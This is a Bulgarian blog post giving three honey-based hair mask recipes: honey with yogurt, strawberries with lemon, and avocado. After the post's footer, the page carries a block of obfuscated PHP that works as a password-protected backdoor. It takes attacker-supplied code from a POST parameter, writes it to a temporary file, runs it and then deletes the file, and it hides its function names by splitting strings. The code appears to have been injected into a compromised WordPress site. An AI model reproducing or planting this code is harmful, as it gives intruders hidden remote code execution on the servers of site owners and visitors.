Няколко рецепти с мед за здрава и красива коса | Косопад

Няколко рецепти с мед за здрава и красива коса

kosa-maska-med

Медът е сред най- добрите природни решения при различни проблеми, свързани с косата – от косопад до липса на блясък.

В съчетание със свойствата на други продукти, можем да получим уникални здравословни комбинации за косата ни.

1. Маска от мед и кисело мляко
Тъй като е богато на млечна киселина, киселото мляко се съчетава идеално с меда в маска за коса. Сместа от тези две съставки е идеална срещу косопад. Помага на косата да възстанови силата и енергията си.
Съставки:
–лъжица кисело мляко
–2 лъжици мед
Начин на приготвяне:
Смесваме двете съставки и нанасяме получената консистенция върху косата. Правим лек масаж, за да проникне добре в косъма. Оставяме да престои 1 час. Плакнем с вода.

kosa-med

2. Плодова маска с ягоди и лимон
Ягодите са богати на антиоксиданти и минерали, като правят косата ни по- силна. Лимонът пък придава естествен блясък на косата. В съчетание, съставките на маската хидратират косата, предпазват я от пърхот и намаляват дразнението на скалпа.
Съставки:
–3 ягоди
–сок от ½ лимон
–2 лъжици мед
Начин на приготвяне:
Намачкваме ягодите и ги смесваме с лимоновия сок и меда. Нанасяме върху косата и покриваме с топла кърпа или шапка за баня.
Оставяме маската да действа 1 час. Мием както обикновено.

3. Маска от мед и авокадо
Помага за възстановяване силата на косата и предпазва от цъфтене. Идеална е за суха коса, за хора, които използват често преса и сешоар.
Съставки:
–1 зряло авокадо
–2 лъжици мед
Начин на приготвяне:
В съд намачкваме авокадото и го смесваме с меда. Нанасяме върху косата, покриваме с кърпа и оставяме да действа 1 час. След като мине това време, мием косата.

03. април 2017 11:41:52 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}